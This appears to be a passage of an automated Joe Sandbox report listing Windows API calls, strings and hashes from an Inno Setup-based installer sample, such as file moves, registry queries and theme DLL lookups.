                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFontIndirectObjectReleaseSelect
                                                                              • String ID: ...\
                                                                              • API String ID: 3133960002-983595016
                                                                              • Opcode ID: 65766ae35a5ff9b042dd79c87bacb89811e544568082cefb05445997e7e8f61e
                                                                              • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                              • Opcode Fuzzy Hash: 65766ae35a5ff9b042dd79c87bacb89811e544568082cefb05445997e7e8f61e
                                                                              • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00496991,_iu,?,00000000,004539F6), ref: 004539AB
                                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00496991,_iu,?,00000000,004539F6), ref: 004539BB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateFileHandle
                                                                              • String ID: .tmp$_iu
                                                                              • API String ID: 3498533004-10593223
                                                                              • Opcode ID: 1bf85a80132bbff87a9a827a47fd0c4a75e2f830b03f5f12b130a42208c1e1fd
                                                                              • Instruction ID: c819285d1904897ee35e15112b57b1097950df4cd651dd5525fdc5768647a91e
                                                                              • Opcode Fuzzy Hash: 1bf85a80132bbff87a9a827a47fd0c4a75e2f830b03f5f12b130a42208c1e1fd
                                                                              • Instruction Fuzzy Hash: 6531C5B0A00249ABCB11EFA5D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,004986D0,00000000,00497E76,?,?,00000000,0049B628), ref: 00497DF0
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,004986D0,00000000,00497E76,?,?,00000000,0049B628), ref: 00497E19
                                                                              • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497E32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: File$Attributes$Move
                                                                              • String ID: isRS-%.3u.tmp
                                                                              • API String ID: 3839737484-3657609586
                                                                              • Opcode ID: c8ffd91a69648c323ebec4846a0c95b9f63ed5ce66c8394ab64ce5c1dd8b2d9f
                                                                              • Instruction ID: d3b1e0af9bc01606b4acbc4251c5ccfb03fd27bd09466a3f7c53cc9bc4e4fae9
                                                                              • Opcode Fuzzy Hash: c8ffd91a69648c323ebec4846a0c95b9f63ed5ce66c8394ab64ce5c1dd8b2d9f
                                                                              • Instruction Fuzzy Hash: F5214F71E14219AFCF11EFA9C881AAFBBB8EF44714F10457BB814B72D1D6389E018B59
                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                              • ExitProcess.KERNEL32 ref: 00404E0D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ExitMessageProcess
                                                                              • String ID: Error$Runtime error at 00000000
                                                                              • API String ID: 1220098344-2970929446
                                                                              • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                              • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                              • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                              • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                              APIs
                                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                              • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A9C
                                                                              • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AC9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                              • String ID: LoadTypeLib$RegisterTypeLib
                                                                              • API String ID: 1312246647-2435364021
                                                                              • Opcode ID: c06c5e8b46d4cc008794e6ef7648282b6775267df5f2c1a0af32ed40ef5fa1a3
                                                                              • Instruction ID: f320f84dc8d434ac547319b1f88b10c46afed2bb2b034f8a1d5164c41c1038b2
                                                                              • Opcode Fuzzy Hash: c06c5e8b46d4cc008794e6ef7648282b6775267df5f2c1a0af32ed40ef5fa1a3
                                                                              • Instruction Fuzzy Hash: CE118430B00604AFDB11DFA6CD55A5AB7BDEB89705F518476FD04D3652DA389E04CA14
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456FBA
                                                                              • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00457057
                                                                              Strings
                                                                              • Failed to create DebugClientWnd, xrefs: 00457020
                                                                              • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FE6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                              • API String ID: 3850602802-3720027226
                                                                              • Opcode ID: 6dc4dd13ffff63052e532ec2970cf3a172fdf6ef35738a55e650b02f86b7c4d3
                                                                              • Instruction ID: 7b454b92cb1dfb233f50f2560aabdc39b6abe04e8f027f2194e5078dec578530
                                                                              • Opcode Fuzzy Hash: 6dc4dd13ffff63052e532ec2970cf3a172fdf6ef35738a55e650b02f86b7c4d3
                                                                              • Instruction Fuzzy Hash: 571127706083409BE310ABA8DC81B5FBBD89B14719F01403AFE849B3C3D7795818C7AE
                                                                              APIs
                                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                              • GetFocus.USER32 ref: 00478277
                                                                              • GetKeyState.USER32(0000007A), ref: 00478289
                                                                              • WaitMessage.USER32(?,00000000,004782B0,?,00000000,004782D7,?,?,00000001,00000000,?,?,?,0047FEE6,00000000,00480DAC), ref: 00478293
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FocusMessageStateTextWaitWindow
                                                                              • String ID: Wnd=$%x
                                                                              • API String ID: 1381870634-2927251529
                                                                              • Opcode ID: f1958697a4901136eb243dbe20eb39cbb326672f79de8de72c1a435ff1b0447b
                                                                              • Instruction ID: 17992b3effc84475d262d1a309b63da61542e22f0e105337c9737e95fd9359ad
                                                                              • Opcode Fuzzy Hash: f1958697a4901136eb243dbe20eb39cbb326672f79de8de72c1a435ff1b0447b
                                                                              • Instruction Fuzzy Hash: B811A730644644AFC701FF65DC5999E7BB8EB49304F9184FAF408E7692DB386900CA69
                                                                              APIs
                                                                              • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E48C
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E49B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$LocalSystem
                                                                              • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                              • API String ID: 1748579591-1013271723
                                                                              • Opcode ID: 2c82eb517319c4feb0678a2222fa1caa0c7cc9d70da35f771929cd42352f02e5
                                                                              • Instruction ID: a22b2a007e2cf2d6de8f80eb00497e2bff53ee2dc74e74251f844a221e221b1c
                                                                              • Opcode Fuzzy Hash: 2c82eb517319c4feb0678a2222fa1caa0c7cc9d70da35f771929cd42352f02e5
                                                                              • Instruction Fuzzy Hash: 3711F8A440C3919ED340DF6AC44432BBAE4AB89708F44496EF9C8D6381E77AC948DB67
                                                                              APIs
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,00498261,00000000,004982B6,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15,00000000), ref: 0045349F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesDeleteErrorLastMove
                                                                              • String ID: DeleteFile$MoveFile
                                                                              • API String ID: 3024442154-139070271
                                                                              • Opcode ID: 75fc53fd0ddaa48128ef6cce4dae119495c42920ad3f5386662393d2e6d8c133
                                                                              • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                              • Opcode Fuzzy Hash: 75fc53fd0ddaa48128ef6cce4dae119495c42920ad3f5386662393d2e6d8c133
                                                                              • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592F1,00000000,004594A9,?,00000000,00000000,00000000), ref: 00459201
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                              • API String ID: 47109696-2631785700
                                                                              • Opcode ID: 7bfc696592b003d8a6b238063e783ff3189b4dca7eb8d211325608debd19b0e7
                                                                              • Instruction ID: d749d17306166952b18a3f7a40743e5d4d539800c31903ae925bcb827c574b5e
                                                                              • Opcode Fuzzy Hash: 7bfc696592b003d8a6b238063e783ff3189b4dca7eb8d211325608debd19b0e7
                                                                              • Instruction Fuzzy Hash: EEF0C231700150EBCB10EB9AD895B4E7398DB95356F50453BF980CB263C63CCC0ACA6E
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004836E9
                                                                              • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0048370C
                                                                              Strings
                                                                              • System\CurrentControlSet\Control\Windows, xrefs: 004836B6
                                                                              • CSDVersion, xrefs: 004836E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                              • API String ID: 3677997916-1910633163
                                                                              • Opcode ID: b08de6e064ab0066fdf25e92b32557c09a13beb56fb99f55e24ba5929372f4fd
                                                                              • Instruction ID: e2e1efa57e06e253ed5c33608a99233e6d60fcd3e82f395225068b7938859aaf
                                                                              • Opcode Fuzzy Hash: b08de6e064ab0066fdf25e92b32557c09a13beb56fb99f55e24ba5929372f4fd
                                                                              • Instruction Fuzzy Hash: 07F036F5A40209B6DF10EBD1CC45B9F77FC9B04B05F108567E910E7280E678DB048B59
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                              • API String ID: 1646373207-4063490227
                                                                              • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                              • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                              • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                              • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                              • API String ID: 1646373207-260599015
                                                                              • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                              • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                              • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                              • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498762), ref: 0044F77F
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: NotifyWinEvent$user32.dll
                                                                              • API String ID: 1646373207-597752486
                                                                              • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                              • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                              • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                              • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004987B8,00000001,00000000,004987DC), ref: 004984E2
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004984E8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                              • API String ID: 1646373207-834958232
                                                                              • Opcode ID: 0a6869f336692cffb72a3d37b5043cace6ddfe1b26e102b83d1b95de8ab3ca94
                                                                              • Instruction ID: 53974a48addda20669242eeec291eced9f9b3ea586a0102388b68221815f3be9
                                                                              • Opcode Fuzzy Hash: 0a6869f336692cffb72a3d37b5043cace6ddfe1b26e102b83d1b95de8ab3ca94
                                                                              • Instruction Fuzzy Hash: 8EB092C0280703689C8032BA0C02F1F08484C4272CB10003F3810A40C7ED6CDC00083D
                                                                              APIs
                                                                                • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498762), ref: 0044B67F
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                              • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049878A), ref: 00464477
